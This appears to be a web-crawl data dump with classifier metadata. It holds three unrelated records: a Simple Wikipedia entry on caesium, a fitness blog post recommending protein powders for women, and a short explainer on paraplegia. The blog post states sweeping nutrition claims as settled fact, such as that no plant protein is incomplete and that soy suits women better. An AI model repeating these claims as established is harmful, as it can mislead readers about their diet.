"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "4",
"label": "Advanced Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "4",
"label": "Graduate/Expert Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-4,551,363,429,478,253,000
|
Caesium
element with the atomic number of 55
Caesium (or cesium) is the chemical element with the atomic number 55 on the periodic table. Its symbol is Cs.
Caesium, 55Cs
Some pale gold metal, with a liquid-like texture and lustre, sealed in a glass ampoule
Caesium
Pronunciation/ˈsziəm/ (SEE-zee-əm)
Alternative namecesium (US, informal)
Appearancepale gold
Standard atomic weight Ar, std(Cs)132.90545196(6)[1]
Caesium in the periodic table
Hydrogen Helium
Lithium Beryllium Boron Carbon Nitrogen Oxygen Fluorine Neon
Sodium Magnesium Aluminium Silicon Phosphorus Sulfur Chlorine Argon
Potassium Calcium Scandium Titanium Vanadium Chromium Manganese Iron Cobalt Nickel Copper Zinc Gallium Germanium Arsenic Selenium Bromine Krypton
Rubidium Strontium Yttrium Zirconium Niobium Molybdenum Technetium Ruthenium Rhodium Palladium Silver Cadmium Indium Tin Antimony Tellurium Iodine Xenon
Caesium Barium Lanthanum Cerium Praseodymium Neodymium Promethium Samarium Europium Gadolinium Terbium Dysprosium Holmium Erbium Thulium Ytterbium Lutetium Hafnium Tantalum Tungsten Rhenium Osmium Iridium Platinum Gold Mercury (element) Thallium Lead Bismuth Polonium Astatine Radon
Francium Radium Actinium Thorium Protactinium Uranium Neptunium Plutonium Americium Curium Berkelium Californium Einsteinium Fermium Mendelevium Nobelium Lawrencium Rutherfordium Dubnium Seaborgium Bohrium Hassium Meitnerium Darmstadtium Roentgenium Copernicium Nihonium Flerovium Moscovium Livermorium Tennessine Oganesson
Rb
Cs
Fr
xenoncaesiumbarium
Atomic number (Z)55
Groupgroup 1: hydrogen and alkali metals
Periodperiod 6
Block s-block
Electron configuration[Xe] 6s1
Electrons per shell2, 8, 18, 18, 8, 1
Physical properties
Phase at STPsolid
Melting point301.7 K (28.5 °C, 83.3 °F)
Boiling point944 K (671 °C, 1240 °F)
Density (near r.t.)1.93 g/cm3
when liquid (at m.p.)1.843 g/cm3
Critical point1938 K, 9.4 MPa[2]
Heat of fusion2.09 kJ/mol
Heat of vaporization63.9 kJ/mol
Molar heat capacity32.210 J/(mol·K)
Vapor pressure
P (Pa) 1 10 100 1 k 10 k 100 k
at T (K) 418 469 534 623 750 940
Atomic properties
Oxidation states−1, +1[3] (a strongly basic oxide)
ElectronegativityPauling scale: 0.79
Ionization energies
• 1st: 375.7 kJ/mol
• 2nd: 2234.3 kJ/mol
• 3rd: 3400 kJ/mol
Atomic radiusempirical: 265 pm
Covalent radius244±11 pm
Van der Waals radius343 pm
Color lines in a spectral range
Spectral lines of caesium
Other properties
Natural occurrenceprimordial
Crystal structurebody-centered cubic (bcc)
Bodycentredcubic crystal structure for caesium
Thermal expansion97 µm/(m⋅K) (at 25 °C)
Thermal conductivity35.9 W/(m⋅K)
Electrical resistivity205 nΩ⋅m (at 20 °C)
Magnetic orderingparamagnetic[4]
Young's modulus1.7 GPa
Bulk modulus1.6 GPa
Mohs hardness0.2
Brinell hardness0.14 MPa
CAS Number7440-46-2
History
Namingfrom Latin caesius, sky blue, for its spectral colours
DiscoveryRobert Bunsen and Gustav Kirchhoff (1860)
First isolationCarl Setterberg (1882)
Main isotopes of caesium
Isotope Abundance Half-life (t1/2) Decay mode Product
133Cs 100% stable
134Cs syn 2.0648 y ε 134Xe
β 134Ba
135Cs trace 2.3×106 y β 135Ba
137Cs syn 30.17 y[5] β 137Ba
Category: Caesium
| references
Caesium is an alkali metal. Its melting point is low (28 °C). It is extremely reactive. Because of its high reactivity, it is a dangerous chemical. It may set itself on fire (ignite) in air. It explodes on contact with water. It reacts more violently than the other alkali metals with water. Because of this, caesium is stored in mineral oil.[6]
Caesium is a rare element. Since there is little caesium on the Earth, it is rather expensive. The human body does not need caesium. In large amounts, its chemical compounds are mildly poisonous because it is close to potassium, which the body does need.
HistoryEdit
Caesium was first described in 1860, by Gustav Robert Kirchhoff and Robert Wilhelm Bunsen. They were testing mineral water, from Bad Dürkheim. After they separated calcium, strontium, magnesium and lithium, they saw two lines in the "blue" range of the spectrum. Because of these lines, they concluded that in addition to the elements already found, there must be another unknown substance in the mineral water. They named this substance caesium, after the color blue.[7]
Isotopes and compoundsEdit
Caesium has at least 39 known isotopes ranging in atomic mass from 112 to 151. Only one of these, 133Cs, is stable. Therefore, the naturally-occurring isotope of caesium is 133Cs, which is not radioactive. 133Cs is used in atomic clocks, its vibration frequency used to define the length of the second. Another isotope, 137Cs is not made naturally but is made after nuclear fission has been done. It is very radioactive and used as an industrial gamma ray source.
Caesium forms compounds with many other chemical elements. Caesium formate is used in oil drilling because of its high density.
ReactivityEdit
Caesium is extremely reactive in air and water. Caesium rapidly oxidizes in air and can spontaneously combust[8] (randomly catch on fire) at any moment. For this reason, it must be stored in kerosene or a mineral oil, like other group one elements (Lithium, Natrium, Rubidium, and Francium.) In water, Caesium violently reacts to make Caesium Hydroxide (2CsOH).[9] The Caesium sinks for about one second, then explodes. The explosion is over 50 times the size of the size of the element dropped in the water, and the explosion is enough to break a common Pyrex Beaker, Flask, or Test Tube. You can find a video of the reaction here.
ReferencesEdit
1. "Standard Atomic Weights: Caesium". CIAAW. 2013.
2. Haynes, William M., ed. (2011). CRC Handbook of Chemistry and Physics (92nd ed.). Boca Raton, FL: CRC Press. p. 4.121. ISBN 1439855110.
3. 3.0 3.1 Dye, J. L. (1979). "Compounds of Alkali Metal Anions". Angewandte Chemie International Edition. 18 (8): 587–598. doi:10.1002/anie.197905871.
4. "Magnetic susceptibility of the elements and inorganic compounds". Handbook of Chemistry and Physics (PDF) (87th ed.). CRC press. ISBN 0-8493-0487-3. Retrieved 2010-09-26.
5. "NIST Radionuclide Half-Life Measurements". NIST. Retrieved 2011-03-13.
6. William C. Butterman et al 2004. "Mineral Commodity Profile: Cesium" (PDF). United States Geological Survey. Retrieved 2009-12-27.
7. G. Kirchhoff, R. Bunsen: Chemische Analyse durch Spectralbeobachtungen. In: Annalen der Physik und Chemie. 1861, 189, 7, S. 337–381 (doi:10.1002/andp.18611890702).
8. Interest, Compound (2019-08-06). "IYPT 2019 Elements 055: Caesium: Atomic clocks and explosive reactions". Compound Interest. Retrieved 2019-11-13.
9. "WebElements Periodic Table » Caesium » reactions of elements". www.webelements.com. Retrieved 2019-11-13.
|
{
"url": "https://simple.m.wikipedia.org/wiki/Caesium",
"source_domain": "simple.m.wikipedia.org",
"snapshot_id": "crawl=CC-MAIN-2022-21",
"warc_metadata": {
"Content-Length": "91171",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:37KCO2XFKHYNJ2MNZAH4MP62HFUIAGP2",
"WARC-Concurrent-To": "<urn:uuid:52f359ab-b4b3-4cc0-a289-dfaf93a1f4b2>",
"WARC-Date": "2022-05-24T13:15:02Z",
"WARC-IP-Address": "208.80.154.224",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:4YUIJWPRRBNRNNLZSVAT4IIQH2ZZ4MKG",
"WARC-Record-ID": "<urn:uuid:09a2893a-4eee-4e6a-9a80-5d1526587d1b>",
"WARC-Target-URI": "https://simple.m.wikipedia.org/wiki/Caesium",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:66a75872-c964-4a7e-81c4-d72ce54ce821>"
},
"warc_info": "isPartOf: CC-MAIN-2022-21\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2022\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-189\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.3-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
8,
9,
46,
47,
158,
159,
173,
260,
268,
303,
341,
361,
414,
444,
460,
521,
589,
735,
888,
1171,
1495,
1498,
1499,
1502,
1503,
1506,
1525,
1545,
1586,
1601,
1616,
1647,
1685,
1705,
1723,
1765,
1804,
1834,
1867,
1900,
1926,
1958,
1994,
2009,
2040,
2073,
2091,
2142,
2179,
2199,
2221,
2244,
2265,
2296,
2321,
2348,
2380,
2406,
2423,
2452,
2495,
2542,
2582,
2615,
2657,
2690,
2713,
2733,
2750,
2775,
2795,
2803,
2864,
2915,
2953,
2978,
3035,
3053,
3080,
3088,
3118,
3147,
3166,
3179,
3180,
3526,
3527,
3782,
3783,
3795,
3796,
4268,
4269,
4296,
4297,
4761,
4762,
4890,
4891,
4906,
4907,
5540,
5541,
5556,
5557,
5611,
5752,
5906,
6083,
6160,
6296,
6465,
6618
],
"line_end_idx": [
8,
9,
46,
47,
158,
159,
173,
260,
268,
303,
341,
361,
414,
444,
460,
521,
589,
735,
888,
1171,
1495,
1498,
1499,
1502,
1503,
1506,
1525,
1545,
1586,
1601,
1616,
1647,
1685,
1705,
1723,
1765,
1804,
1834,
1867,
1900,
1926,
1958,
1994,
2009,
2040,
2073,
2091,
2142,
2179,
2199,
2221,
2244,
2265,
2296,
2321,
2348,
2380,
2406,
2423,
2452,
2495,
2542,
2582,
2615,
2657,
2690,
2713,
2733,
2750,
2775,
2795,
2803,
2864,
2915,
2953,
2978,
3035,
3053,
3080,
3088,
3118,
3147,
3166,
3179,
3180,
3526,
3527,
3782,
3783,
3795,
3796,
4268,
4269,
4296,
4297,
4761,
4762,
4890,
4891,
4906,
4907,
5540,
5541,
5556,
5557,
5611,
5752,
5906,
6083,
6160,
6296,
6465,
6618,
6729
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 6729,
"ccnet_original_nlines": 113,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.1757618635892868,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.02905740961432457,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.3508150279521942,
"rps_doc_frac_unique_words": 0.603715181350708,
"rps_doc_mean_word_length": 5.542827606201172,
"rps_doc_num_sentences": 121,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.971006393432617,
"rps_doc_word_count": 969,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.020480360835790634,
"rps_doc_frac_chars_dupe_6grams": 0,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.0055855498649179935,
"rps_doc_frac_chars_top_3gram": 0.005213180091232061,
"rps_doc_frac_chars_top_4gram": 0.007447400130331516,
"rps_doc_books_importance": -642.4349975585938,
"rps_doc_books_importance_length_correction": -642.4349975585938,
"rps_doc_openwebtext_importance": -339.0323791503906,
"rps_doc_openwebtext_importance_length_correction": -339.0323791503906,
"rps_doc_wikipedia_importance": -228.40582275390625,
"rps_doc_wikipedia_importance_length_correction": -228.40582275390625
},
"fasttext": {
"dclm": 0.3318464159965515,
"english": 0.6107739806175232,
"fineweb_edu_approx": 3.1282589435577393,
"eai_general_math": 0.6542201042175293,
"eai_open_web_math": 0.5034298896789551,
"eai_web_code": 0.006571109872311354
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "546.73",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Inorganic"
}
},
"secondary": {
"code": "546.7",
"labels": {
"level_1": "Science and Natural history",
"level_2": "Chemistry",
"level_3": "Chemistry, Inorganic"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "1",
"label": "Factual"
},
"secondary": {
"code": "2",
"label": "Conceptual"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "0",
"label": "No Artifacts"
},
"secondary": {
"code": "3",
"label": "Irrelevant Content"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "4",
"label": "Missing Images or Figures"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "8",
"label": "Documentation"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "4",
"label": "Highly Correct"
},
"secondary": {
"code": "3",
"label": "Mostly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
2,609,560,797,866,586,600
|
Choosing The Best Protein Powder For Women
2
3246
protein women
Are you looking to make a change? Whether you’re trying to gain, lose or maintain weight, today we’ll provide some insight on choosing the best protein for women.
When it comes to building and maintaining muscle as well as optimizing your energy levels, protein is an absolutely critical building block in your diet. Drinking protein shakes between meals can help curb appetite and prevent you from snacking. In addition, if you’re trying a simple weight loss diet, protein shakes with a few vegetables can serve as a nutritious meal replacement.
So then that leaves the question of what are the right protein shakes for women? Any supplement store in America is going to almost overwhelm a first time buyer, so we’ll try to arm you with what you need to know to make the best decision for your body and goals.
Did you know the word ‘protein’ means ‘the first quality’? The ancient Greeks (the first scholars and scientists in recorded history) recognized it as the building block of the body.
Protein helps the body through:
• Making hormones
• Creating antibodies for the immune system
• Repairing muscles
• Building new muscle tissue
• Creating proper fluid and acidic balance in the blood
• Controlling metabolic processes
• Serving as an emergency energy source
If you consume more protein than you need to maintain and repair your body, your body can build new muscle with the excess. That’s the goal. And you’ll need a lot of protein, as much as 1-1.5g per pound of body weight. Many athletes stack their diet full of whole food protein including lean meats, fish, nuts and eggs. Still, to reach the levels of protein needed for growth, the right protein powder can really help.
Whole food proteins slow the digestive system so they can be fully absorbed and have thermic properties that boost your metabolic rate.
Best Protein Powder For Women
Egg and Milk Protein
While it was believed for a time that eggs could be bad for you, updated research has concluded that the fats and cholesterols found in eggs are actually beneficial. Eggs make a great addition to any diet and you’ll need to build muscle with a variety of amino acids.
Milk protein can also help you stack those grams of lean muscle building blocks. This can include cheeses, yogurts and kefirs. Ideally, your milk protein should be bioactive. That means the natural enzymes have not been killed off. Other protein sources are heated during processing which kills the protein fraction.
If you want to go or stay vegan, you can still build a great, strong body with plant based foods and vegan protein powders like VegaSport.
Complete Proteins and Incomplete Proteins
Possibly one of the most prevalent and misguided pieces of advice out there is the myth of the incomplete plant proteins.
There are no incomplete proteins!
The false idea that plant proteins are “incomplete” has been taught in medical schools, is still quoted in textbooks and has even been quoted by trusted experts such as the Nutrition Committee of the American Heart Association.
It all started when Frances Moore Lappé wrote the first edition for the book Diet for a Small Planet. The vision of the book was to educate people on the concept that to feed the world efficiently, we need to feed people plants, instead of feeding animals plants and eating the animals. She noted that valuable food calories were lost that could have been used to feed everyone.
In her book, Lappé incorrectly mentioned that plants were incomplete proteins and that you had to combine them correctly to get all of your essential amino acids. She tried to right the wrong when she made a second edition to the book, but the idea was already entrenched in dietary literature.
While some plants have lower levels of one amino acid, and higher levels of others, it has been proven that all plants contain the essential amino acids. There are no amino acids, essential, or nonessential that HAVE to be obtained from an animal source.
Although the American Heart Association later tried to set the record straight on complete plant proteins, this myth crops up all over scientific and nutrition articles and websites.
Best Protein Powder
Supplementing
So now that you have some ideas on what to eat, how do you make up for the rest of the protein you need to build muscle? If your goals require higher grams and you can’t spend the whole day cooking eggs, roasting chicken and drinking milk, then what do you do?
We get these questions a lot, “what is the best protein powder for weight loss,” ” what is the best protein powder for women,” “what are the best protein supplements for women?”
When you need to get more grams of protein and don’t have the time to prepare a whole chicken or a dozen eggs, protein supplements might be the way to go. Reliable protein supplements can help you get the amino acids you need for the day.
Now, you should also be aware that processed oils can actually slow down your metabolic state, so pick your supplements carefully. Processed oils are kryptonite to building strong muscle. This can ruin energy levels and even subject your heart and arteries to irreversible damage. Steer clear.
It’s always best to avoid supplements with too much sugar as well. This might seem like a no-brainer for some, but we’re always surprised how loaded with sugar some popular ‘nutrition products’ are.
So, when there are so many bright and shiny packages out there, how are you supposed to know which one is right for you?
What actually are the best protein shakes for women?
Protein Powder Hype
The fitness world is full of companies claiming their products are the best. Some will even boast advantages of their supplements over eating the foods that make them up. Don’t forget, whole foods should always form the basis of your diet. The idea of ‘supplementing’ is adding and filling nutritional gaps, not replacing. Often marketers will tell you that their product is the best protein shake for weight loss, or that they make the best protein supplements for women.
The issue we have with some of these claims of having developed the best protein shakes for weight loss, is that when you are looking for the best protein powder for women or men, weight loss should not be the main focus. I’ll explain.
Protein in its various forms helps you build quality, lean muscle. This comes down to body composition. Losing pounds is just a number, but displacing body fat with lean, toned muscle will leave you healthier and looking your best.
You won’t need a protein powder for weight loss, as your body sheds the unwanted fat and replaces it with healthy muscle without a designated weight loss protein powder.
best whey protein for women
Know the Value of Your Supplements
Let’s look at value of the protein in supplements.
There are a few methods that help to judge the quality of a protein product. The first is called “bioavailability,” sometimes called “biological value” or “BV” in supplement language.
In general, bioavailability is a measure of how much of the focus nutrient is able to be digested and used by the body. Think of it as a measure of digestive efficiency.
Amino acids are the broken down chains present in protein. The more of the amino acids that are actually used by the body, the higher BV rating the source is given.
For the purpose of having a steady measure, nitrogen is the element being looked at here. Nitrogen is a base element in amino acids, so if the nitrogen is there, it came from the amino acids digested.
The BV measurement uses a percentage scale. So if you take eggs for an example, with a BV of around 94, that means that only 6% of the food value is lost in digestion. Meanwhile, most legumes have a BV of around 45, which means you only gain 45% of the available nitrogen from legumes versus the 94% from eggs.
More bang for your buck?
Next is quality. You might hear talk about quality protein sources. BV rating can help you get a clearer picture of how well the protein is absorbed into your body.
Chemical scoring of proteins is complex and is mostly being evaluated on the basis of the availability of one particular amino acid. While this can give you a very complex chemical makeup of a food if you need to pay attention to a certain amino acid, even the most disciplined bodybuilders do not generally need to evaluate their food on that level of specialized profiling.
If you are already at the level of being considered a strength athlete, you most likely already get enough protein. In that case, it might not be important for you to have to count up the BV of your food choices. If not, it can be extremely helpful to calculate your protein needs for the day by your body weight and determine how much more you need per day to meet it.
The results may surprise you.
Milk Protein Supplements
Milk proteins are casein and whey. The best casein protein supplement is one that also includes whey protein. Whey supplements are the most common and have been beloved across the body building world for many years. While casein digests much slower and gives more complete absorption of the aminos, whey offers faster absorption. So, these two make a great pair.
It is also very common to supplement with just whey. Whey protein has a BV of 100 or close to it. Remember, the best whey protein for women will have has a few grams of sugar as possible. Same goes for guys.
Some recent claims by supplement providers have included increased immune response, rare antioxidant compounds and even cancer fighting properties. While you would have to go into the research to see where the claims come from, these are interesting advancements to say the least. Time will tell if these claims pan out!
So, there we have the dairy-based supplements, what’s the best vegan protein powder?
Soy Protein Supplements
The reason soy protein is not as popular as whey is because of the way soy works in the body. It has been suggested that it acts as estrogen and this worries men who don’t want it affecting their testosterone levels. While studies show that this effect only takes place with very high doses in men, research has pointed to soy protein as a better protein powder for women.
Veggie Protein Supplements
Another thing to consider about the best vegan protein powders is that in recent years with so much soy going GMO, some people have preferred to avoid it altogether. Veggie-based protein powders have stormed the market with non-soy alternatives.
Plus, if you’re going to supplement, veggie proteins are awesome because you get the benefits of vitamins and minerals found in veggies as well.
All plant-based proteins are going to be a bit more bitter due to the fiber, so look through the reviews carefully for a product people describe as “smooth,” or “mixes well.” If you need some great smoothie flavors you can check out our ebook.
Best Protein Powder For Women Final Verdict
Really, when you look at it, the best protein for women is going to be the same protein any man would want to build quality muscle. While men and women do build muscle differently, protein and amino acids are not digested any differently.
Men and women’s bodies distribute fat and muscle a bit differently, but this is often due to different training emphasis. If your goal is a lean, strong body, or a large muscular physique, fueling your body’s protein needs comes down to goals. Eat big to get big! Or, eat lean and nutritious to stay lean and nutritious! Either way, quality protein sources are an absolutely essential building block.
-Terry Asher
Follow Me
Terry
Gym Junkies Founder & Editor in Chief at Gym Junkies LLC
I’m Terry and I’m here to help you achieve your fitness goals. I truly believe anyone can achieve the figure they want with the proper guidance. Through my extensive fitness blog, top fitness videos, leading workout supplements, and top selling eBooks, I have been able to help thousands of people online lose weight, tone up and get in shape. My passion is helping people all around the world change their lives for the better.
Follow Me
2 COMMENTS
LEAVE A REPLY
Please enter your comment!
Please enter your name here
|
{
"url": "https://gymjunkies.com/choosing-best-protein-powder-women/",
"source_domain": "gymjunkies.com",
"snapshot_id": "crawl=CC-MAIN-2020-29",
"warc_metadata": {
"Content-Length": "124906",
"Content-Type": "application/http; msgtype=response",
"WARC-Block-Digest": "sha1:4D3C4MYPGLE3QYBOQV3STM7IP6RQSLQS",
"WARC-Concurrent-To": "<urn:uuid:92f62850-1e0d-4f4a-9bec-638db77bd39b>",
"WARC-Date": "2020-07-06T20:38:53Z",
"WARC-IP-Address": "104.197.95.149",
"WARC-Identified-Payload-Type": "text/html",
"WARC-Payload-Digest": "sha1:7BCDUMFDPLBQ5MZ4R772F5NW64BTCE27",
"WARC-Record-ID": "<urn:uuid:7e66996f-2759-419b-9b83-d682170b752b>",
"WARC-Target-URI": "https://gymjunkies.com/choosing-best-protein-powder-women/",
"WARC-Truncated": null,
"WARC-Type": "response",
"WARC-Warcinfo-ID": "<urn:uuid:2ab265c9-2b30-46bf-bf68-895412d23a13>"
},
"warc_info": "isPartOf: CC-MAIN-2020-29\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for July 2020\r\noperator: Common Crawl Admin ([email protected])\r\nhostname: ip-10-67-67-114.ec2.internal\r\nsoftware: Apache Nutch 1.17 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/"
}
|
{
"line_start_idx": [
0,
43,
44,
46,
51,
52,
66,
67,
230,
231,
615,
616,
880,
881,
1064,
1065,
1097,
1098,
1118,
1164,
1186,
1217,
1275,
1311,
1353,
1354,
1773,
1774,
1910,
1911,
1941,
1942,
1963,
1964,
2232,
2233,
2550,
2551,
2690,
2691,
2733,
2734,
2856,
2857,
2891,
2892,
3120,
3121,
3500,
3501,
3796,
3797,
4052,
4053,
4236,
4237,
4257,
4258,
4272,
4273,
4534,
4535,
4713,
4714,
4953,
4954,
5248,
5249,
5448,
5449,
5570,
5571,
5624,
5625,
5645,
5646,
6119,
6120,
6356,
6357,
6589,
6590,
6760,
6761,
6789,
6790,
6825,
6826,
6877,
6878,
7062,
7063,
7233,
7234,
7399,
7400,
7601,
7602,
7913,
7914,
7939,
7940,
8105,
8106,
8482,
8483,
8853,
8854,
8884,
8885,
8910,
8911,
9274,
9275,
9483,
9484,
9805,
9806,
9891,
9892,
9916,
9917,
10290,
10291,
10318,
10319,
10565,
10566,
10711,
10712,
10956,
10957,
11001,
11002,
11241,
11242,
11643,
11644,
11657,
11658,
11660,
11661,
11663,
11664,
11674,
11675,
11681,
11682,
11739,
12168,
12178,
12179,
12190,
12191,
12205,
12206,
12233
],
"line_end_idx": [
43,
44,
46,
51,
52,
66,
67,
230,
231,
615,
616,
880,
881,
1064,
1065,
1097,
1098,
1118,
1164,
1186,
1217,
1275,
1311,
1353,
1354,
1773,
1774,
1910,
1911,
1941,
1942,
1963,
1964,
2232,
2233,
2550,
2551,
2690,
2691,
2733,
2734,
2856,
2857,
2891,
2892,
3120,
3121,
3500,
3501,
3796,
3797,
4052,
4053,
4236,
4237,
4257,
4258,
4272,
4273,
4534,
4535,
4713,
4714,
4953,
4954,
5248,
5249,
5448,
5449,
5570,
5571,
5624,
5625,
5645,
5646,
6119,
6120,
6356,
6357,
6589,
6590,
6760,
6761,
6789,
6790,
6825,
6826,
6877,
6878,
7062,
7063,
7233,
7234,
7399,
7400,
7601,
7602,
7913,
7914,
7939,
7940,
8105,
8106,
8482,
8483,
8853,
8854,
8884,
8885,
8910,
8911,
9274,
9275,
9483,
9484,
9805,
9806,
9891,
9892,
9916,
9917,
10290,
10291,
10318,
10319,
10565,
10566,
10711,
10712,
10956,
10957,
11001,
11002,
11241,
11242,
11643,
11644,
11657,
11658,
11660,
11661,
11663,
11664,
11674,
11675,
11681,
11682,
11739,
12168,
12178,
12179,
12190,
12191,
12205,
12206,
12233,
12260
]
}
|
{
"red_pajama_v2": {
"ccnet_original_length": 12260,
"ccnet_original_nlines": 156,
"rps_doc_curly_bracket": 0,
"rps_doc_ldnoobw_words": 0,
"rps_doc_lorem_ipsum": 0,
"rps_doc_stop_word_fraction": 0.4490220546722412,
"rps_doc_ut1_blacklist": 0,
"rps_doc_frac_all_caps_words": 0.008322929963469505,
"rps_doc_frac_lines_end_with_ellipsis": 0,
"rps_doc_frac_no_alph_words": 0.11485642939805984,
"rps_doc_frac_unique_words": 0.3301842212677002,
"rps_doc_mean_word_length": 4.646669864654541,
"rps_doc_num_sentences": 115,
"rps_doc_symbol_to_word_ratio": 0,
"rps_doc_unigram_entropy": 5.658039093017578,
"rps_doc_word_count": 2117,
"rps_doc_frac_chars_dupe_10grams": 0,
"rps_doc_frac_chars_dupe_5grams": 0.03537663817405701,
"rps_doc_frac_chars_dupe_6grams": 0.010775639675557613,
"rps_doc_frac_chars_dupe_7grams": 0,
"rps_doc_frac_chars_dupe_8grams": 0,
"rps_doc_frac_chars_dupe_9grams": 0,
"rps_doc_frac_chars_top_2gram": 0.012097179889678955,
"rps_doc_frac_chars_top_3gram": 0.01565518043935299,
"rps_doc_frac_chars_top_4gram": 0.012198840267956257,
"rps_doc_books_importance": -1123.599365234375,
"rps_doc_books_importance_length_correction": -1123.599365234375,
"rps_doc_openwebtext_importance": -668.7552490234375,
"rps_doc_openwebtext_importance_length_correction": -668.7552490234375,
"rps_doc_wikipedia_importance": -435.598388671875,
"rps_doc_wikipedia_importance_length_correction": -435.598388671875
},
"fasttext": {
"dclm": 0.05660355091094971,
"english": 0.9640468955039978,
"fineweb_edu_approx": 1.9487560987472534,
"eai_general_math": 0.007568059954792261,
"eai_open_web_math": 0.17627263069152832,
"eai_web_code": 0.0008484100108034909
}
}
|
{
"free_decimal_correspondence": {
"primary": {
"code": "613.2",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
},
"secondary": {
"code": "613.7",
"labels": {
"level_1": "Industrial arts, Technology, and Engineering",
"level_2": "Medicine",
"level_3": "Health and Hygiene"
}
}
},
"bloom_cognitive_process": {
"primary": {
"code": "2",
"label": "Understand"
},
"secondary": {
"code": "3",
"label": "Apply"
}
},
"bloom_knowledge_domain": {
"primary": {
"code": "2",
"label": "Conceptual"
},
"secondary": {
"code": "3",
"label": "Procedural"
}
},
"document_type_v1": {
"primary": {
"code": "3",
"label": "Reference/Encyclopedic/Educational"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"extraction_artifacts": {
"primary": {
"code": "3",
"label": "Irrelevant Content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"missing_content": {
"primary": {
"code": "0",
"label": "No missing content"
},
"secondary": {
"code": "-1",
"label": "Abstain"
}
},
"document_type_v2": {
"primary": {
"code": "10",
"label": "Knowledge Article"
},
"secondary": {
"code": "17",
"label": "Product Page"
}
},
"reasoning_depth": {
"primary": {
"code": "2",
"label": "Basic Reasoning"
},
"secondary": {
"code": "3",
"label": "Intermediate Reasoning"
}
},
"technical_correctness": {
"primary": {
"code": "3",
"label": "Mostly Correct"
},
"secondary": {
"code": "4",
"label": "Highly Correct"
}
},
"education_level": {
"primary": {
"code": "2",
"label": "High School Level"
},
"secondary": {
"code": "3",
"label": "Undergraduate Level"
}
}
}
|
71f077df794da2774531b20248bb19b0
|
-4,969,799,577,166,901,000
|
What is Paraplegia?
Paraplegia is a medical condition involving impairment in motor or sensory function of the lower extremities, which is a classification of paralysis, the universal term to describe the loss of movement or sensation following damage to a nerve in the body.
Cause
Paraplegia is predominantly the result of a spinal cord injury due to an accident or other trauma. Most common accidents include motor vehicle accidents and falls in those aged over 65.
Spinal injuries aren’t always immediately apparent and numbness or paralysis can be delayed or immediate. Additional injury can occur from resultant swelling and bleeding. For this reason, it is important that medical attention is sought out immediately, as the time frame is critical for optimal recovery and assessment.
Additionally, congenital conditions such as spina bifida, where the neural elements of the spinal canal are affected, are also a known cause. Damage can also ensue from tumors or blood clots, however this is less common.
Paraplegia is most prevalent in males as they are assumed to have a greater tendency towards risky behavior.
Loss of Function
The extent of function lost due to paraplegia corresponds to the extent of damage to the spinal cord and the area affected. Areas of the spinal cord that result in paraplegia are the thoracic, lumbar or sacral regions.
An injury to the upper thoracic (T1 to T8), which is approximately adjacent to the chest, often results in poor trunk control. This can include impairment in breathing. Damage to the lower thoracic (T9 to T12) allow for good trunk function and posture. Lumbar and sacral damage results in poor function of flexors and hips.
Categorization
If the arms are also affected by paralysis, quadriplegia is the proper terminology, whereas if only one limb is affected the correct term is monoplegia.
